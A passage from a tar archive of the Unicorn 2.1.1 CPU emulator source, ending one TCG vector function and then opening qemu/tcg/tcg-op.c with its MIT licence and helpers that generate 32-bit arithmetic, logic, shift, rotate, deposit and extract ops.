tcgv_vec_temp(tcg_ctx, b); TCGTemp *ct = tcgv_vec_temp(tcg_ctx, c); TCGTemp *dt = tcgv_vec_temp(tcg_ctx, d); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg bi = temp_arg(bt); TCGArg ci = temp_arg(ct); TCGArg di = temp_arg(dt); TCGType type = rt->base_type; const TCGOpcode *hold_list; int can; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_debug_assert(ct->base_type >= type); tcg_debug_assert(dt->base_type >= type); tcg_assert_listed_vecop(INDEX_op_cmpsel_vec); hold_list = tcg_swap_vecop_list(NULL); can = tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmpsel_vec, type, vece); if (can > 0) { vec_gen_6(tcg_ctx, INDEX_op_cmpsel_vec, type, vece, ri, ai, bi, ci, di, cond); } else if (can < 0) { tcg_expand_vec_op(tcg_ctx, INDEX_op_cmpsel_vec, type, vece, ri, ai, bi, ci, di, cond); } else { TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_cmp_vec(tcg_ctx, cond, vece, t, a, b); tcg_gen_bitsel_vec(tcg_ctx, vece, r, t, c, d); tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/tcg-op.c���������������������������������������������������������������������0000664�0000000�0000000�00000347473�14675241067�0016307�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "tcg/tcg-mo.h" #include "trace/mem.h" /* Reduce the number of ifdefs below. This assumes that all uses of TCGV_HIGH and TCGV_LOW are properly protected by a conditional that the compiler can eliminate. */ #if TCG_TARGET_REG_BITS == 64 extern TCGv_i32 TCGV_LOW_link_error(TCGv_i64); extern TCGv_i32 TCGV_HIGH_link_error(TCGv_i64); #define TCGV_LOW TCGV_LOW_link_error #define TCGV_HIGH TCGV_HIGH_link_error #endif void tcg_gen_op1(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; } void tcg_gen_op2(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; } void tcg_gen_op3(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; } void tcg_gen_op4(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3, TCGArg a4) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; op->args[3] = a4; } void tcg_gen_op5(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3, TCGArg a4, TCGArg a5) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; op->args[3] = a4; op->args[4] = a5; } void tcg_gen_op6(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3, TCGArg a4, TCGArg a5, TCGArg a6) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; op->args[3] = a4; op->args[4] = a5; op->args[5] = a6; } void tcg_gen_mb(TCGContext *tcg_ctx, TCGBar mb_type) { if (tcg_ctx->tb_cflags & CF_PARALLEL) { tcg_gen_op1(tcg_ctx, INDEX_op_mb, mb_type); } } /* 32 bit ops */ void tcg_gen_addi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_add_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_subfi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, int32_t arg1, TCGv_i32 arg2) { if (arg1 == 0 && TCG_TARGET_HAS_neg_i32) { /* Don't recurse with tcg_gen_neg_i32. */ tcg_gen_op2_i32(tcg_ctx, INDEX_op_neg_i32, ret, arg2); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg1); tcg_gen_sub_i32(tcg_ctx, ret, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_subi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_sub_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_andi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { TCGv_i32 t0; /* Some cases can be optimized here. */ switch (arg2) { case 0: tcg_gen_movi_i32(tcg_ctx, ret, 0); return; case -1: tcg_gen_mov_i32(tcg_ctx, ret, arg1); return; case 0xff: /* Don't recurse with tcg_gen_ext8u_i32. */ if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext8u_i32, ret, arg1); return; } break; case 0xffff: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext16u_i32, ret, arg1); return; } break; } t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_and_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } void tcg_gen_ori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* Some cases can be optimized here. */ if (arg2 == -1) { tcg_gen_movi_i32(tcg_ctx, ret, -1); } else if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_or_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_xori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* Some cases can be optimized here. */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else if (arg2 == -1 && TCG_TARGET_HAS_not_i32) { /* Don't recurse with tcg_gen_not_i32. */ tcg_gen_op2_i32(tcg_ctx, INDEX_op_not_i32, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_xor_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_shli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 32); if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_shl_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_shri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 32); if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_shr_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_sari_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 32); if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_sar_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_brcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, TCGv_i32 arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { l->refs++; tcg_gen_op4ii_i32(tcg_ctx, INDEX_op_brcond_i32, arg1, arg2, cond, label_arg(l)); } } void tcg_gen_brcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, int32_t arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_brcond_i32(tcg_ctx, cond, arg1, t0, l); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_setcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_movi_i32(tcg_ctx, ret, 1); } else if (cond == TCG_COND_NEVER) { tcg_gen_movi_i32(tcg_ctx, ret, 0); } else { tcg_gen_op4i_i32(tcg_ctx, INDEX_op_setcond_i32, ret, arg1, arg2, cond); } } void tcg_gen_setcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_setcond_i32(tcg_ctx, cond, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } void tcg_gen_muli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { if (arg2 == 0) { tcg_gen_movi_i32(tcg_ctx, ret, 0); } else if (is_power_of_2(arg2)) { tcg_gen_shli_i32(tcg_ctx, ret, arg1, ctz32(arg2)); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_mul_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_div_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_div_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_div_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t0, arg1, 31); tcg_gen_op5_i32(tcg_ctx, INDEX_op_div2_i32, ret, t0, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_div_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_rem_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rem_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_rem_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_div_i32, t0, arg1, arg2); tcg_gen_mul_i32(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t0, arg1, 31); tcg_gen_op5_i32(tcg_ctx, INDEX_op_div2_i32, t0, ret, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_rem_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_divu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_div_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_divu_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, 0); tcg_gen_op5_i32(tcg_ctx, INDEX_op_divu2_i32, ret, t0, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_divu_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_remu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rem_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_remu_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_divu_i32, t0, arg1, arg2); tcg_gen_mul_i32(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, 0); tcg_gen_op5_i32(tcg_ctx, INDEX_op_divu2_i32, t0, ret, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_remu_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_andc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_andc_i32, ret, arg1, arg2); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_not_i32(tcg_ctx, t0,arg2); tcg_gen_and_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_eqv_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_eqv_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_eqv_i32, ret, arg1, arg2); } else { tcg_gen_xor_i32(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i32(tcg_ctx, ret, ret); } } void tcg_gen_nand_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_nand_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_nand_i32, ret, arg1, arg2); } else { tcg_gen_and_i32(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i32(tcg_ctx, ret, ret); } } void tcg_gen_nor_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_nor_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_nor_i32, ret, arg1, arg2); } else { tcg_gen_or_i32(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i32(tcg_ctx, ret, ret); } } void tcg_gen_orc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_orc_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_orc_i32, ret, arg1, arg2); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_not_i32(tcg_ctx, t0,arg2); tcg_gen_or_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_clz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_clz_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_clz_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_clz_i64) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t2, arg2); tcg_gen_addi_i64(tcg_ctx, t2, t2, 32); tcg_gen_clz_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_gen_subi_i32(tcg_ctx, ret, ret, 32); } else { gen_helper_clz_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_clzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2) { TCGv_i32 t = tcg_const_i32(tcg_ctx, arg2); tcg_gen_clz_i32(tcg_ctx, ret, arg1, t); tcg_temp_free_i32(tcg_ctx, t); } void tcg_gen_ctz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_ctz_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_ctz_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_ctz_i64) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ctz_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } else if (TCG_TARGET_HAS_ctpop_i32 || TCG_TARGET_HAS_ctpop_i64 || TCG_TARGET_HAS_clz_i32 || TCG_TARGET_HAS_clz_i64) { TCGv_i32 z, t = tcg_temp_new_i32(tcg_ctx); if (TCG_TARGET_HAS_ctpop_i32 || TCG_TARGET_HAS_ctpop_i64) { tcg_gen_subi_i32(tcg_ctx, t, arg1, 1); tcg_gen_andc_i32(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i32(tcg_ctx, t, t); } else { /* Since all non-x86 hosts have clz(0) == 32, don't fight it. */ tcg_gen_neg_i32(tcg_ctx, t, arg1); tcg_gen_and_i32(tcg_ctx, t, t, arg1); tcg_gen_clzi_i32(tcg_ctx, t, t, 32); tcg_gen_xori_i32(tcg_ctx, t, t, 31); } z = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, ret, arg1, z, arg2, t); tcg_temp_free_i32(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, z); } else { gen_helper_ctz_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_ctzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2) { if (!TCG_TARGET_HAS_ctz_i32 && TCG_TARGET_HAS_ctpop_i32 && arg2 == 32) { /* This equivalence has the advantage of not requiring a fixup. */ TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_subi_i32(tcg_ctx, t, arg1, 1); tcg_gen_andc_i32(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i32(tcg_ctx, ret, t); tcg_temp_free_i32(tcg_ctx, t); } else { TCGv_i32 t = tcg_const_i32(tcg_ctx, arg2); tcg_gen_ctz_i32(tcg_ctx, ret, arg1, t); tcg_temp_free_i32(tcg_ctx, t); } } void tcg_gen_clrsb_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_clz_i32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t, arg, 31); tcg_gen_xor_i32(tcg_ctx, t, t, arg); tcg_gen_clzi_i32(tcg_ctx, t, t, 32); tcg_gen_subi_i32(tcg_ctx, ret, t, 1); tcg_temp_free_i32(tcg_ctx, t); } else { gen_helper_clrsb_i32(tcg_ctx, ret, arg); } } void tcg_gen_ctpop_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1) { if (TCG_TARGET_HAS_ctpop_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ctpop_i32, ret, arg1); } else if (TCG_TARGET_HAS_ctpop_i64) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t, arg1); tcg_gen_ctpop_i64(tcg_ctx, t, t); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t); tcg_temp_free_i64(tcg_ctx, t); } else { gen_helper_ctpop_i32(tcg_ctx, ret, arg1); } } void tcg_gen_rotl_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rot_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_rotl_i32, ret, arg1, arg2); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shl_i32(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i32(tcg_ctx, t1, 32, arg2); tcg_gen_shr_i32(tcg_ctx, t1, arg1, t1); tcg_gen_or_i32(tcg_ctx, ret, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_rotli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 32); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else if (TCG_TARGET_HAS_rot_i32) { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_rotl_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, t0, arg1, arg2); tcg_gen_shri_i32(tcg_ctx, t1, arg1, 32 - arg2); tcg_gen_or_i32(tcg_ctx, ret, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_rotr_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rot_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_rotr_i32, ret, arg1, arg2); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shr_i32(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i32(tcg_ctx, t1, 32, arg2); tcg_gen_shl_i32(tcg_ctx, t1, arg1, t1); tcg_gen_or_i32(tcg_ctx, ret, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_rotri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 32); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { tcg_gen_rotli_i32(tcg_ctx, ret, arg1, 32 - arg2); } } void tcg_gen_deposit_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2, unsigned int ofs, unsigned int len) { uint32_t mask; TCGv_i32 t1; tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); if (len == 32) { tcg_gen_mov_i32(tcg_ctx, ret, arg2); return; } if (TCG_TARGET_HAS_deposit_i32 && TCG_TARGET_deposit_i32_valid(ofs, len)) { tcg_gen_op5ii_i32(tcg_ctx, INDEX_op_deposit_i32, ret, arg1, arg2, ofs, len); return; } t1 = tcg_temp_new_i32(tcg_ctx); if (TCG_TARGET_HAS_extract2_i32) { if (ofs + len == 32) { tcg_gen_shli_i32(tcg_ctx, t1, arg1, len); tcg_gen_extract2_i32(tcg_ctx, ret, t1, arg2, len); goto done; } if (ofs == 0) { tcg_gen_extract2_i32(tcg_ctx, ret, arg1, arg2, len); tcg_gen_rotli_i32(tcg_ctx, ret, ret, len); goto done; } } mask = (1u << len) - 1; if (ofs + len < 32) { tcg_gen_andi_i32(tcg_ctx, t1, arg2, mask); tcg_gen_shli_i32(tcg_ctx, t1, t1, ofs); } else { tcg_gen_shli_i32(tcg_ctx, t1, arg2, ofs); } tcg_gen_andi_i32(tcg_ctx, ret, arg1, ~(mask << ofs)); tcg_gen_or_i32(tcg_ctx, ret, ret, t1); done: tcg_temp_free_i32(tcg_ctx, t1); } void tcg_gen_deposit_z_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); if (ofs + len == 32) { tcg_gen_shli_i32(tcg_ctx, ret, arg, ofs); } else if (ofs == 0) { tcg_gen_andi_i32(tcg_ctx, ret, arg, (1u << len) - 1); } else if (TCG_TARGET_HAS_deposit_i32 && TCG_TARGET_deposit_i32_valid(ofs, len)) { TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_op5ii_i32(tcg_ctx, INDEX_op_deposit_i32, ret, zero, arg, ofs, len); tcg_temp_free_i32(tcg_ctx, zero); } else { /* To help two-operand hosts we prefer to zero-extend first, which allows ARG to stay live. */ switch (len) { case 16: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_ext16u_i32(tcg_ctx, ret, arg); tcg_gen_shli_i32(tcg_ctx, ret, ret, ofs); return; } break; case 8: if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_ext8u_i32(tcg_ctx, ret, arg); tcg_gen_shli_i32(tcg_ctx, ret, ret, ofs); return; } break; } /* Otherwise prefer zero-extension over AND for code size. */ switch (ofs + len) { case 16: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_shli_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext16u_i32(tcg_ctx, ret, ret); return; } break; case 8: if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_shli_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext8u_i32(tcg_ctx, ret, ret); return; } break; } tcg_gen_andi_i32(tcg_ctx, ret, arg, (1u << len) - 1); tcg_gen_shli_i32(tcg_ctx, ret, ret, ofs); } } void tcg_gen_extract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); /* Canonicalize certain special cases, even if extract is supported. */ if (ofs + len == 32) { tcg_gen_shri_i32(tcg_ctx, ret, arg, 32 - len); return; } if (ofs == 0) { tcg_gen_andi_i32(tcg_ctx, ret, arg, (1u << len) - 1); return; } if (TCG_TARGET_HAS_extract_i32 && TCG_TARGET_extract_i32_valid(ofs, len)) { tcg_gen_op4ii_i32(tcg_ctx, INDEX_op_extract_i32, ret, arg, ofs, len); return; } /* Assume that zero-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 16: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_ext16u_i32(tcg_ctx, ret, arg); tcg_gen_shri_i32(tcg_ctx, ret, ret, ofs); return; } break; case 8: if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_ext8u_i32(tcg_ctx, ret, arg); tcg_gen_shri_i32(tcg_ctx, ret, ret, ofs); return; } break; } /* ??? Ideally we'd know what values are available for immediate AND. Assume that 8 bits are available, plus the special case of 16, so that we get ext8u, ext16u. */ switch (len) { case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 16: tcg_gen_shri_i32(tcg_ctx, ret, arg, ofs); tcg_gen_andi_i32(tcg_ctx, ret, ret, (1u << len) - 1); break; default: tcg_gen_shli_i32(tcg_ctx, ret, arg, 32 - len - ofs); tcg_gen_shri_i32(tcg_ctx, ret, 